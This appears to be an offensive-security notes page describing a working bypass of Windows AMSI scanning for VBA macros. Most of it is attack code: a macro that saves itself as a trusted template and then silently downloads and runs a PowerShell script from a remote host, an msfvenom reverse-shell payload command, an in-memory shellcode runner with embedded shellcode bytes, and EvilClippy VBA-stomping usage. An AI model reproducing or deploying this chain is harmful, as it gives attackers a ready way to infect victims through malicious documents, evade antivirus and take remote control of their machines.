VBA AMSI bypass

In Windows 10, Microsoft has introduced the Antimalware scanning interface. This feature acts as an interface between script interpreters and anti-virus engines. It currently supports the PowerShell engine, the Windows Script Host (wscript.exe and cscript.exe) and recently support for Visual Basic for Applications (VBA) has been introduced.

Any COM method and Win32 API call should end up in the ‘Behaviour log’.
Specific calls have been marked as ‘triggers’. These are high risk executions. Once they are observed, macro execution is halted, and the contents of the circular log are passed to AMSI for AV to make a decision.
Based on testing it appears that p-code based attacks where the VBA code is stomped will still be picked up by the AMSI engine (e.g. files manipulated by our tool EvilClippy).
In the default configuration, the AMSI engine is not enabled on all macro enabled documents. The ‘macro runtime scope’ is by default set to ‘enabled for low trust documents’. This means that trusted documents, documents from a trusted location or signed by a trusted publisher will not be provided to the AMSI engine under the default setting.

Working bypass

Works as of 27/05/2023 on Windows 11 Enterprise 22621.ni_release.220506-1250

VBA

Sub autoopen()
    'function called by the initial 'dropper' code, drops a dotm into %appdata\microsoft templates
    curfile = ActiveDocument.Path & "\" & ActiveDocument.Name
    templatefile = Environ("appdata") & "\Microsoft\Templates\" & DateDiff("s", #1/1/1970#, Now()) & ".dotm"

    ActiveDocument.SaveAs2 FileName:=templatefile, FileFormat:=wdFormatXMLTemplateMacroEnabled, AddToRecentFiles:=True

    ' save back to orig location, otherwise AMSI will kcik in (as we are the template)
    ActiveDocument.SaveAs2 FileName:=curfile, FileFormat:=wdFormatXMLDocumentMacroEnabled

    ' now create a new file based on template
    Documents.Add Template:=templatefile, NewTemplate:=False, DocumentType:=0
End Sub

Sub autonew()
    ' this function is called from a trusted location, not in the AMSI logs
    ' Shell "calc.exe"
    
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadString('http://192.168.220.128/platform.txt') | IEX"
    Shell str, vbHide
End Sub

AutoNew -> Triggered each time you create a new document

EvilClippy

EvilClippy.exe -s fake.vba -r test.doc

fake.vba

Private Sub AutoOpen()
MsgBox "My nice fake code!"
End Sub

(for some reason -g prevented code from executing)

Shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.220.128 LPORT=443 -f ps1

(meterpreter did not work)

Powershell Runner (reflection)

platform.txt

function LookupFunc {
    Param ($moduleName, $functionName)

    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
        Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))
}

function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )

    $type = [AppDomain]::CurrentDomain.
    DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
    [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
    DefineDynamicModule('InMemoryModule', $false).
    DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
    [System.MulticastDelegate])
    $type.
    DefineConstructor('RTSpecialName, HideBySig, Public',
    [System.Reflection.CallingConventions]::Standard, $func).
    SetImplementationFlags('Runtime, Managed')
    $type.
    DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
    SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)

[Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8>

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],
[UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))).Invoke($hThread, 0xFFFFFFFF)

References

Last updated 2 years ago

hashtagWorking bypass

hashtagVBA

hashtagEvilClippy

hashtagShellcode

hashtagPowershell Runner (reflection)

hashtagReferences

Working bypass

VBA

EvilClippy

Shellcode

Powershell Runner (reflection)

References